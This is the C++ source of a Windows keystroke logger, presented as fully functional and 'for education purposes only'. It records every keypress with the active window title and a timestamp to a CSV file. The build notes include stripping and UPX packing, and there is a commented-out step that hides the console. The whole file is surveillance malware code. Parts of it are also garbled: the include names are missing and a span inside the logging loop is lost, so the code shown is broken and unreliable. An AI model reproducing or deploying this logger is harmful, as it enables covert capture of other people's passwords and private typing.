//~ Copyright 2009 16 Systems. All rights reserved. //~ This is a very basic yet fully functional Windows keystroke logger. //~ It is intended for education purposes only. #include #include #include #include #include #include "boost/date_time/posix_time/posix_time.hpp" #include "boost/date_time/local_time/local_time.hpp" //~ Build like this on Windows XP, Vista or Windows 7 //~ This assumes you have mingw and msys and boost installed //~ The stripping and packing are optional //~ -------------------------- //~ g++ -static -Os 16k.cpp -o 16k.exe \ //~ -Ic://Boost/include/boost-1_40 \ //~ c://Boost/lib/libboost_date_time-mgw34-s.lib //~ strip 16k.exe //~ upx 16k.exe //~ -------------------------- std::map > vk() { //~ http://msdn.microsoft.com/en-us/library/ms645540%28VS.85%29.aspx //~ http://vmd.myxomop.com/apires/ref/g/getasynckeystate.html std::map > k; std::vector k1(2, " LM "); // Left Mouse Button k[1] = k1; std::vector k2(2, " RM "); // Right Mouse Button k[2] = k2; std::vector k4(2, " MM "); // Middle Mouse Button k[4] = k4; std::vector k8(2, " BS "); // Backspace k[8] = k8; std::vector k9(2, " TAB "); // Tab k[9] = k9; std::vector k12; k12.push_back(" clear "); k12.push_back(" CLEAR "); k[12] = k12; std::vector k13; k13.push_back(" enter "); k13.push_back(" ENTER "); k[13] = k13; std::vector k16; k16.push_back(""); k16.push_back(""); k[16] = k16; // The Shift Key std::vector k17; k17.push_back(" ctrl "); k17.push_back(" CTRL "); k[17] = k17; std::vector k18; k18.push_back(" alt "); k18.push_back(" ALT "); k[18] = k18; std::vector k19; k19.push_back(" pause "); k19.push_back(" PAUSE "); k[19] = k19; std::vector k20; k20.push_back(" caps "); k20.push_back(" CAPS "); k[20] = k20; std::vector k32; k32.push_back(" "); k32.push_back(" "); k[32] = k32; //0x20 This is the space bar std::vector k48; k48.push_back("0"); k48.push_back(")"); k[48] = k48; //0x30 std::vector k49; k49.push_back("1"); k49.push_back("!"); k[49] = k49; std::vector k50; k50.push_back("2"); k50.push_back("@"); k[50] = k50; std::vector k51; k51.push_back("3"); k51.push_back("#"); k[51] = k51; std::vector k52; k52.push_back("4"); k52.push_back("$"); k[52] = k52; std::vector k53; k53.push_back("5"); k53.push_back("%"); k[53] = k53; std::vector k54; k54.push_back("6"); k54.push_back("^"); k[54] = k54; std::vector k55; k55.push_back("7"); k55.push_back("&"); k[55] = k55; std::vector k56; k56.push_back("8"); k56.push_back("*"); k[56] = k56; std::vector k57; k57.push_back("9"); k57.push_back("("); k[57] = k57; //0x39 std::vector k65; k65.push_back("a"); k65.push_back("A"); k[65] = k65; //0x41 std::vector k66; k66.push_back("b"); k66.push_back("B"); k[66] = k66; std::vector k67; k67.push_back("c"); k67.push_back("C"); k[67] = k67; std::vector k68; k68.push_back("d"); k68.push_back("D"); k[68] = k68; std::vector k69; k69.push_back("e"); k69.push_back("E"); k[69] = k69; std::vector k70; k70.push_back("f"); k70.push_back("F"); k[70] = k70; std::vector k71; k71.push_back("g"); k71.push_back("G"); k[71] = k71; //0x47 std::vector k72; k72.push_back("h"); k72.push_back("H"); k[72] = k72; std::vector k73; k73.push_back("i"); k73.push_back("I"); k[73] = k73; std::vector k74; k74.push_back("j"); k74.push_back("J"); k[74] = k74; std::vector k75; k75.push_back("k"); k75.push_back("K"); k[75] = k75; std::vector k76; k76.push_back("l"); k76.push_back("L"); k[76] = k76; std::vector k77; k77.push_back("m"); k77.push_back("M"); k[77] = k77; std::vector k78; k78.push_back("n"); k78.push_back("N"); k[78] = k78; std::vector k79; k79.push_back("o"); k79.push_back("O"); k[79] = k79; std::vector k80; k80.push_back("p"); k80.push_back("P"); k[80] = k80; std::vector k81; k81.push_back("q"); k81.push_back("Q"); k[81] = k81; std::vector k82; k82.push_back("r"); k82.push_back("R"); k[82] = k82; std::vector k83; k83.push_back("s"); k83.push_back("S"); k[83] = k83; std::vector k84; k84.push_back("t"); k84.push_back("T"); k[84] = k84; std::vector k85; k85.push_back("u"); k85.push_back("U"); k[85] = k85; std::vector k86; k86.push_back("v"); k86.push_back("V"); k[86] = k86; std::vector k87; k87.push_back("w"); k87.push_back("W"); k[87] = k87; std::vector k88; k88.push_back("x"); k88.push_back("X"); k[88] = k88; std::vector k89; k89.push_back("y"); k89.push_back("Y"); k[89] = k89; std::vector k90; k90.push_back("z"); k90.push_back("Z"); k[90] = k90; //0x5A std::vector k96(2, "0"); std::vector k97(2, "1"); std::vector k98(2, "2"); std::vector k99(2, "3"); std::vector k100(2, "4"); std::vector k101(2, "5"); std::vector k102(2, "6"); std::vector k103(2, "7"); std::vector k104(2, "8"); std::vector k105(2, "9"); std::vector k106(2, "*"); std::vector k107(2, "+"); std::vector k108(2, " Separator_key "); std::vector k109(2, "-"); std::vector k110(2, "."); std::vector k111(2, "/"); k[96] = k96; k[97] = k97; k[98] = k98; k[99] = k99; k[100] = k100; k[101] = k101; k[102] = k102; k[103] = k103; k[104] = k104; k[105] = k105; k[106] = k106; k[107] = k107; k[108] = k108; k[109] = k109; k[110] = k110; k[111] = k111; std::vector k186; k186.push_back(";"); k186.push_back(":"); k[186] = k186; std::vector k187; k187.push_back("="); k187.push_back("+"); k[187] = k187; std::vector k188; k188.push_back(","); k188.push_back("<"); k[188] = k188; std::vector k189; k189.push_back("-"); k189.push_back("_"); k[189] = k189; std::vector k190; k190.push_back("."); k190.push_back(">"); k[190] = k190; std::vector k191; k191.push_back("/"); k191.push_back("?"); k[191] = k191; //0xBF std::vector k192; k192.push_back("`"); k192.push_back("~"); k[192] = k192; std::vector k219; k219.push_back("["); k219.push_back("{"); k[219] = k219; std::vector k220; k220.push_back("\\"); k220.push_back("|"); k[220] = k220; std::vector k221; k221.push_back("]"); k221.push_back("}"); k[221] = k221; std::vector k222; k222.push_back("'"); k222.push_back("\""); k[222] = k222; //0xDE std::cout << k.size() << std::endl; return k; } int main() { // Hide the windows console (may be a better way to do this?) //FreeConsole(); std::map > k = vk(); std::map >::iterator kiter; //---------------------------------------------------------------------------------------- std::ofstream opfile("16k.csv", std::ios::out); opfile << "Key_Word" << "\t" << "Active_Window" << "\t" << "Micro_Seconds" << "\t" << "Key_State" << "\t" << "Time" << std::endl; //---------------------------------------------------------------------------------------- HWND currenthwnd; // This is required. std::string will not work here. char window_title[2048]; boost::posix_time::ptime one = boost::posix_time::microsec_clock::local_time(); boost::posix_time::ptime two = boost::posix_time::microsec_clock::local_time(); std::string state; std::string word; long time_state; bool shift; int ks; while (1) { shift = false; currenthwnd = GetForegroundWindow(); for( kiter = k.begin(); kiter != k.end(); ++kiter ) { two = boost::posix_time::microsec_clock::local_time(); ks = GetAsyncKeyState(kiter->first); GetWindowText(currenthwnd, window_title, 2048); time_t rawtime; time ( &rawtime ); tm *t = localtime( &rawtime ); // Shift key is being pressed and held down. if ( ks == -32768 && kiter->first == 16) { shift = true; } // Key state has changed. if ( ks == -32767 ) { boost::posix_time::time_duration td = two - one; // When a key is pressed and held, only log it once. if (td.total_microseconds() <= 46875 && (kiter->second[0] == state || kiter->second[1] == state) ) { //std::cout << kiter->second << "\tREPEAT\t" << td.total_microseconds() << std::endl; //opfile << kiter->second << "\tREPEAT\t" << td.total_microseconds() << std::endl; ; } else { // The user pressed the enter key if ( kiter->second[0] == " enter ") { std::cout << word << "\t" << window_title << "\t" << td.total_microseconds() << "\t" << ks << "\t" << asctime(t) <second[1] << "\t" << window_title << "\t" << td.total_microseconds() << "\t" << ks << "\t" << asctime(t) << std::endl; opfile << kiter->second[1] << "\t" << window_title << "\t" << td.total_microseconds() << "\t" << ks << "\t"<< asctime(t) << std::endl; word.append( kiter->second[1] ); state = kiter->second[1]; } // Lowercase else { std::cout << kiter->second[0] << "\t" << window_title << "\t" << td.total_microseconds() << "\t" << ks << "\t" << asctime(t) << std::endl; opfile << kiter->second[0] << "\t" << window_title << "\t" << td.total_microseconds() << "\t"<< ks << "\t" << asctime(t) << std::endl; word.append( kiter->second[0] ); state = kiter->second[0]; } } } one = two; time_state = td.total_microseconds(); } } Sleep(15); } //---------------------------------------------------------------------------------------- opfile.close(); return 0; }